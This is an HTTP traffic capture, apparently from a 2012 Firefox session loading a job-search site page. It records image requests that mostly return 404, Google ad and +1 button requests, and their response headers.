User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=396
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/06a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:17 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/08a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/07a.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Range: bytes=0-
If-Range: &quot;19b842-23f-4ae8f0ab47e80&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/slogan.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /pagead/ads?client=ca-pub-2219810647891587&format=468x15_0ads_al&output=html&h=15&w=468&lmt=1352305275&channel=1562902687&color_bg=FFFFFF&color_border=330099&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305277969&bpp=8&shv=r20121031&jsv=r20110914&correlator=1352305278081&frm=22&adk=178692872&ga_vid=792442701.1352305277&ga_sid=1352305277&ga_hid=818000803&ga_fc=1&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=1159&ish=3&ifk=3570190657&oid=3&ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&fu=0&ifi=1&dtd=424&xpc=LDWjdPVe11&p=http%3A//www.betterjobsearch.com HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-2219810647891587&amp;format=468x15_0ads_al&amp;output=html&amp;h=15&amp;w=468&amp;lmt=1352305275&amp;channel=1562902687&amp;color_bg=FFFFFF&amp;color_border=330099&amp;color_link=0000FF&amp;color_text=000000&amp;color_url=008000&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277969&amp;bpp=8&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305278081&amp;frm=22&amp;adk=178692872&amp;ga_vid=792442701.1352305277&amp;ga_sid=1352305277&amp;ga_hid=818000803&amp;ga_fc=1&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=1159&amp;ish=3&amp;ifk=3570190657&amp;oid=3&amp;ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;fu=0&amp;ifi=1&amp;dtd=424&amp;xpc=LDWjdPVe11&amp;p=http%3A//www.betterjobsearch.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /_/+1/fastbutton?bsv=m&hl=en-US&origin=http%3A%2F%2Fwww.betterjobsearch.com&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&ic=1&jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3Dzfq9BF98FFM.no.%2Fsv%3D1%2Fam%3D!R7JhevK68w2IwTSFZw%2Fd%3D1%2Frs%3DAItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g HTTP/1.1

Host: plusone.google.com
GET /_/+1/fastbutton?bsv=m&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.betterjobsearch.com&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3Dzfq9BF98FFM.no.%2Fsv%3D1%2Fam%3D!R7JhevK68w2IwTSFZw%2Fd%3D1%2Frs%3DAItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Wed, 07 Nov 2012 16:21:18 GMT
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
GET /jobsearchtools.html/186/images/clouds4_08.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /jobsearchtools.html/186/images/clouds4_09.jpg HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=395
Connection: Keep-Alive
GET /pagead/ads?client=ca-pub-2219810647891587&format=336x280_as&output=html&h=280&w=336&lmt=1352305275&channel=1562902687&ad_type=text&color_bg=FFFFFF&color_border=330099&color_link=0000FF&color_text=000000&color_url=008000&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305278088&bpp=4&shv=r20121031&jsv=r20110914&prev_fmts=468x15_0ads_al&correlator=1352305278081&pv_ch=1562902687%2B&frm=22&adk=650799283&ga_vid=792442701.1352305277&ga_sid=1352305277&ga_hid=818000803&ga_fc=1&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=serif&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=1159&ish=3&ifk=3570190657&oid=3&ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&fu=0&ifi=2&dtd=453&xpc=0L1dHPgTcB&p=http%3A//www.betterjobsearch.com HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-2219810647891587&amp;format=336x280_as&amp;output=html&amp;h=280&amp;w=336&amp;lmt=1352305275&amp;channel=1562902687&amp;ad_type=text&amp;color_bg=FFFFFF&amp;color_border=330099&amp;color_link=0000FF&amp;color_text=000000&amp;color_url=008000&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305278088&amp;bpp=4&amp;shv=r20121031&amp;jsv=r20110914&amp;prev_fmts=468x15_0ads_al&amp;correlator=1352305278081&amp;pv_ch=1562902687%2B&amp;frm=22&amp;adk=650799283&amp;ga_vid=792442701.1352305277&amp;ga_sid=1352305277&amp;ga_hid=818000803&amp;ga_fc=1&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=serif&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=1159&amp;ish=3&amp;ifk=3570190657&amp;oid=3&amp;ref=http%3A%2F%2Fartworksmagazine.com%2F2010%2F04%2Fphotography-of-alexis-west%2F&amp;loc=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;fu=0&amp;ifi=2&amp;dtd=453&amp;xpc=0L1dHPgTcB&amp;p=http%3A//www.betterjobsearch.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 403 Forbidden

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: cafe
Cache-Control: private
Content-Length: 82
X-XSS-Protection: 1; mode=block
GET /images/logos.gif HTTP/1.1

Host: www.career2.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache
Last-Modified: Mon, 06 Apr 2009 08:47:52 GMT
Accept-Ranges: bytes
Content-Length: 8278
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Thu, 01 Nov 2012 01:08:52 GMT
Expires: Fri, 01 Nov 2013 01:08:52 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 573146
GET /jobsearchtools.html/images/538_bjs.gif HTTP/1.1

Host: www.betterjobsearch.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.betterjobsearch.com/jobsearchtools.html/counter.php
HTTP/1.1 404 Not Found

Content-Type: text/html
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Oct 2011 15:41:30 GMT
Etag: &quot;19b842-23f-4ae8f0ab47e80&quot;
Accept-Ranges: bytes
Content-Length: 575
Keep-Alive: timeout=5, max=394
Connection: Keep-Alive
GET /pagead/ads?client=ca-pub-2910537132751306&output=html&h=280&slotname=6394158133&w=336&ea=0&flash=10.0.45&url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&dt=1352305277758&bpp=6&shv=r20121031&jsv=r20110914&correlator=1352305277913&frm=8&adk=1028924267&ga_vid=1740851937.1352305278&ga_sid=1352305278&ga_hid=506299075&ga_fc=0&u_tz=60&u_his=1&u_java=1&u_h=885&u_w=1176&u_ah=855&u_aw=1176&u_cd=24&u_nplug=8&u_nmime=54&dff=arial&dfs=16&adx=-12245933&ady=-12245933&biw=-12245933&bih=-12245933&isw=343&ish=340&ifk=3411974630&oid=3&fu=0&ifi=1&dtd=174 HTTP/1.1

Host: googleads.g.doubleclick.net
GET /pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www-open-opensocial.googleusercontent.com/gadgets/ifr?url=http%3A%2F%2Fnuzs.com%2Fpromotion.xml&amp;container=open&amp;view=home&amp;lang=all&amp;country=ALL&amp;debug=0&amp;nocache=0&amp;sanitize=0&amp;v=232824d3a7ae247c&amp;source=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;parent=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;libs=core%3Acore.io
Cookie: id=223ae1776901005b||t=1350343758|et=730|cs=002213fd480aa30e9cef2f5d42
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
P3P: policyref=&quot;http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml&quot;, CP=&quot;CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR&quot;
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Date: Wed, 07 Nov 2012 16:21:18 GMT
Server: cafe
Cache-Control: private
Content-Length: 11614
X-XSS-Protection: 1; mode=block
GET /_/apps-static/_/js/plusone/p1b,p1p/rt=j/ver=qAmRLELdy3M.en_US./sv=1/am=!NBYAyjO5WNGFzTm-5g/d=1/rs=AItRSTN7T34k3e_LZ644-otkr_WiEVp_8g/cb=gapi.loaded_1 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.betterjobsearch.com&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3Dzfq9BF98FFM.no.%2Fsv%3D1%2Fam%3D!R7JhevK68w2IwTSFZw%2Fd%3D1%2Frs%3DAItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;-51526071&quot;
Expires: Thu, 06 Dec 2012 23:00:52 GMT
Date: Tue, 06 Nov 2012 23:00:52 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 21182
Age: 62426
GET /_/apps-static/_/js/gapi/googleapis_client,iframes_styles_bubble_internal/rt=j/ver=zfq9BF98FFM.no./sv=1/am=!R7JhevK68w2IwTSFZw/d=1/rs=AItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g/cb=gapi.loaded_0 HTTP/1.1

Host: plusone.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://plusone.google.com/_/+1/fastbutton?bsv=m&amp;hl=en-US&amp;origin=http%3A%2F%2Fwww.betterjobsearch.com&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;ic=1&amp;jsh=m%3B%2F_%2Fapps-static%2F_%2Fjs%2Fgapi%2F__features__%2Frt%3Dj%2Fver%3Dzfq9BF98FFM.no.%2Fsv%3D1%2Fam%3D!R7JhevK68w2IwTSFZw%2Fd%3D1%2Frs%3DAItRSTOFOTeV3g2f5Xg8Wf3esjJMS5F10g
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Etag: &quot;1347143796&quot;
Expires: Fri, 07 Dec 2012 02:13:02 GMT
Date: Wed, 07 Nov 2012 02:13:02 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=2592000
Content-Length: 34150
Age: 50896
GET /pagead/images/adchoices/en.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2910537132751306&amp;output=html&amp;h=280&amp;slotname=6394158133&amp;w=336&amp;ea=0&amp;flash=10.0.45&amp;url=http%3A%2F%2Fwww.betterjobsearch.com%2Fjobsearchtools.html%2Fcounter.php&amp;dt=1352305277758&amp;bpp=6&amp;shv=r20121031&amp;jsv=r20110914&amp;correlator=1352305277913&amp;frm=8&amp;adk=1028924267&amp;ga_vid=1740851937.1352305278&amp;ga_sid=1352305278&amp;ga_hid=506299075&amp;ga_fc=0&amp;u_tz=60&amp;u_his=1&amp;u_java=1&amp;u_h=885&amp;u_w=1176&amp;u_ah=855&amp;u_aw=1176&amp;u_cd=24&amp;u_nplug=8&amp;u_nmime=54&amp;dff=arial&amp;dfs=16&amp;adx=-12245933&amp;ady=-12245933&amp;biw=-12245933&amp;bih=-12245933&amp;isw=343&amp;ish=340&amp;ifk=3411974630&amp;oid=3&amp;fu=0&amp;ifi=1&amp;dtd=174
If-None-Match: 8618641207806323095
HTTP/1.1 304 Not Modified

HTTP/1.1 304 Not Modified
Date: Wed, 07 Nov 2012 01:59:34 GMT
Expires: Thu, 08 Nov 2012 01:59:34 GMT
Etag: 8618641207806323095
Age: 51704
Server: GFE/2.0
GET /pagead/images/adchoices/icon.png HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
